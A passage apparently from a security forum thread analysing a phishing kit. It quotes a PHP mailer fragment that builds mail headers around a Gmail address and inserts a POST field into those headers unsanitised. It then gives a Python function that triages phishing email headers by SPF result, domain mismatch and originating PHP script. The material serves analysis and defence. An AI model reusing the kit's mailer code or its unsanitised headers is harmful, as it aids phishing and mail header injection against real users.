$headers = "Frm: ayoub.boos7@gmail.com>";
$headers .= $_POST['eMAdd']."\n";
$headers .= "MIME-Version: 1.0\n";

mail($send,$subject,$message,$headers);
additional stuff: http://www.kernelmode.info/forum/viewto ... =20#p18118
Attachments
infected
(57.38 KiB) Downloaded 87 times
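The headers in both mail sources above carry the same tells (spf=none, a From domain that differs from the envelope sender, and cPanel/Exim X-Source headers naming a PHP script as the originating process). As an added example that is not from the post or from the kit, here is a small Python triage that pulls those fields out of a raw message; the input is a constructed header block modelled on the second sample, with the recipient masked.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed input: the second post's headers, trimmed to the ones the
# triage reads, with the recipient masked (header names/values are from the page).
SAMPLE_HEADERS = """\
Authentication-Results: hotmail.com; spf=none (sender IP is 199.204.248.102) smtp.mailfrom=p42907r6@cpanel02.myhostcenter.com; dkim=none header.d=orange.com; x-hmca=none
Received: from cpanel02.myhostcenter.com ([199.204.248.102]) by SNT0-MC2-F18.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
\t Thu, 7 Feb 2013 16:00:53 -0800
Received: from p42907r6 by cpanel02.myhostcenter.com with local (Exim 4.69)
\t(envelope-from <p42907r6@cpanel02.myhostcenter.com>)
\tid 1U3bOe-000FbN-GE
\tfor masked@example.invalid; Thu, 07 Feb 2013 19:00:52 -0500
To: masked@example.invalid
Subject: Remboursement avoir sur facture
From: Orange <monagence@orange.com>
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php /home/p42907r6/public_html/Ayoubii.php
X-Source-Dir: meridianliquidcoatings.com:/public_html
Return-Path: p42907r6@cpanel02.myhostcenter.com

"""


def domain_of(addr: str) -> str:
    """Lower-cased domain part of an address like 'Name <user@host>'."""
    return parseaddr(addr)[1].rpartition("@")[2].lower()


def triage(raw: str) -> dict:
    """Pull the fields an analyst checks first and flag the usual phish tells."""
    msg = message_from_string(raw)
    auth = msg.get("Authentication-Results", "")
    ip = re.search(r"sender IP is ([\d.]+)", auth)
    spf = re.search(r"\bspf=(\w+)", auth)
    env = re.search(r"smtp\.mailfrom=([^\s;]+)", auth)

    from_domain = domain_of(msg.get("From", ""))
    envelope_domain = domain_of(env.group(1)) if env else ""

    # cPanel/Exim stamp the originating process; a php interpreter with a
    # script path means the mail came from a web script, not a mail client.
    args = msg.get("X-Source-Args", "").split()
    php_script = args[-1] if msg.get("X-Source", "").endswith("php") and args else ""

    # A "with local" Received hop means a local process on that host submitted it.
    hops = msg.get_all("Received") or []
    local_submit = any("with local" in h for h in hops)

    reasons = []
    if spf and spf.group(1) != "pass":
        reasons.append(f"spf={spf.group(1)} for envelope sender")
    if from_domain and from_domain != envelope_domain:
        reasons.append(f"From domain {from_domain} != envelope {envelope_domain}")
    if php_script:
        reasons.append(f"generated by web script {php_script}")
    if local_submit and not php_script:
        reasons.append("locally submitted on the relay host")

    return {
        "sender_ip": ip.group(1) if ip else "",
        "spf": spf.group(1) if spf else "",
        "from_domain": from_domain,
        "envelope_domain": envelope_domain,
        "php_script": php_script,
        "reasons": reasons,
        "suspicious": bool(reasons),
    }
```

The same function applied to the first sample would report the `ayoubooxx.php` path from its X-Source-Args header, which is the file to pull from the compromised host when cleaning it up.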